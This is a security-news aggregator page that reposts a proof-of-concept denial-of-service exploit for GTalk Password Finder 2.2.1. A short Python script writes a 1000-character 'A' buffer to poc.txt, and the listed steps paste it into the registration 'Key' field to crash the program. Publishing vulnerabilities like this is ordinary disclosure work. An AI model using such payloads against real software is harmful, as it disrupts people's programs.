HackDig : Dig high-quality web security articles for hackers

GTalk Password Finder 2.2.1 Denial Of Service

2020-01-19 23:20
# Exploit Title: GTalk Password Finder 2.2.1 - 'Key' Denial of Service (PoC)# Exploit Author: Ismail Tasdelen# Exploit Date: 2020-01-16# Vendor Homepage : http://www.nsauditor.com/# Link Software : http://www.nsauditor.com/downloads/gpwdfinder_setup.exe# Tested on OS: Windows 10# CVE : N/A'''Proof of Concept (PoC):=======================1.Download and install GTalk Password Finder2.Run the python operating script that will create a file (poc.txt)3.Run the software "Register -> Enter Registration Code4.Copy and paste the characters in the file (poc.txt)5.Paste the characters in the field 'Key' and click on 'Ok'6.GTalk Password Finder Crashed'''#!/usr/bin/python    buffer = "A" * 1000 payload = buffertry:    f=open("poc.txt","w")    print("[+] Creating %s bytes evil payload." %len(payload))    f.write(payload)    f.close()    print("[+] File created!")except:    print("File cannot be created.")


Source: 9310100202-BLW/eussi/moc.ytirucesxc

Read:743 | Comments:0 | Tags:No Tag

“GTalk Password Finder 2.2.1 Denial Of Service”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Announce

Share high-quality web security related articles with you:)

Tools

Tag Cloud